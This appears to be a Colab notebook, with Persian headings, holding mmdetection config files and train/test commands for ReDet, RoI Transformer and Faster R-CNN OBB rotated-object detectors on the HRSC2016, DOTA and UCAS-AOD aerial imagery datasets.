train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
)
# dataset settings
dataset_type = 'HRSCL1Dataset'
###################################################################################
data_root = '/content/ReDet/data/HRSC2016/'########################################
###################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'Train/HRSC_L1_train.json',
img_prefix=data_root + 'Train/images/',
img_scale=(800, 512),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'Test/HRSC_L1_test.json',
img_prefix=data_root + 'Test/images/',
img_scale=(800, 512),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
ann_file=data_root + 'Test/HRSC_L1_test.json',
img_prefix=data_root + 'Test/images/',
img_scale=(800, 512),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[24, 33])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=1,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 36
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = '/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016'
load_from = None
resume_from = None
workflow = [('train', 1)]
# VOC2007 metrics
# AP50: 90.46 AP75: 89.46 mAP: 70.41
```
faster_rcnn_RoITrans_r50_fpn_1x_dota config
```
# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py
%%writefile /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py
##########این کانفیگ از ریپازیتوری اصلی کپی شده
# model settings
model = dict(
type='RoITransformer',
pretrained='modelzoo://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
# score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)
score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'DOTADataset'
######################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/dota1024new/'
######################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images/',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'test1024/DOTA_test1024.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'test1024/images',
# img_prefix=data_root + 'val1024/images',
# ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',
# img_prefix=data_root + 'test1024_ms/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota'
load_from = None
resume_from = None
workflow = [('train', 1)]
```
faster_rcnn_obb_r50_fpn_1x_dota config
```
# %pycat /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py
%%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py
##########این کانفیگ از ریپازیتوری اصلی کپی شده
# model settings
model = dict(
type='FasterRCNNOBB',
pretrained='modelzoo://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=False,
with_module=False,
hbb_trans='hbbpolyobb',
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
# score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)
score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'DOTADataset'
#################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/dota1024new/'
#################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images/',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'test1024/DOTA_test1024.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'test1024/images',
# img_prefix=data_root + 'val1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=1,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_obb_r50_fpn_1x_dota'
load_from = None
resume_from = None
workflow = [('train', 1)]
```
# UCAS_AOD config
```
# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py
%%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py
##########این کانفیگ از ریپازیتوری اصلی کپی شده
# model settings
model = dict(
type='RoITransformer',
pretrained='modelzoo://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
##############################################
num_classes=2,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
###################################################
num_classes=2,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
# score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)
score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'UCASAOD'
######################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/UCAS-AOD/'
######################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'Train/mmtrain.json',
img_prefix=data_root + 'Train/images/',
img_scale=(659, 1280),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'val/mmval.json',
img_prefix=data_root + 'val/images',
img_scale=(659, 1280),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'Test/mmtest.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'Test/images',
# img_prefix=data_root + 'val1024/images',
# ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',
# img_prefix=data_root + 'test1024_ms/images',
img_scale=(659, 1280),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=6)
# yapf:disable
log_config = dict(
interval=6,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD'
load_from = None
resume_from = None
workflow = [('train', 1)]
# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py
# %%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659.py
##########این کانفیگ از ریپازیتوری اصلی کمک گرفته است
# model settings
model = dict(
type='RoITransformer',
pretrained='modelzoo://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=3,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=3,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
# score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)
score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'UCASAOD'
######################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/UCAS_AOD659/'
######################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'trainval659/DOTA_trainval659.json',
img_prefix=data_root + 'trainval659/images/',
img_scale=(659, 659),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'trainval659/DOTA_trainval659.json',
img_prefix=data_root + 'trainval659/images',
img_scale=(659, 659),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'test659/DOTA_test659.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'test659/images',
# img_prefix=data_root + 'val1024/images',
# ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',
# img_prefix=data_root + 'test1024_ms/images',
img_scale=(659, 659),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=6)
# yapf:disable
log_config = dict(
interval=6,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 36
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659'
load_from = None
resume_from = None
workflow = [('train', 1)]
```
# آموزش شبکه
```
!python tools/train.py /content/AerialDetection/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py --resume_from /content/AerialDetection/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_11.pth
!mv /content/AerialDetection/data/dota /content/drive/MyDrive/dota_dataaaaa
```
# UCAS_AOD آموزش
```
%cd /content/ReDet
!python tools/train.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py \
# --resume_from /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_6.pth
%cd /content/ReDet
!python tools/train.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659.py \
# --resume_from /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_6.pth
```
# تست کردن شبکه
ReDet_re50_refpn_1x_dota1 test
```
!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \
/content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/results.pkl
!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \
/content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/results.pkl
!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \
/content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/valresults.pkl
```
faster_rcnn_RoITrans_r50_fpn_1x_dota test
```
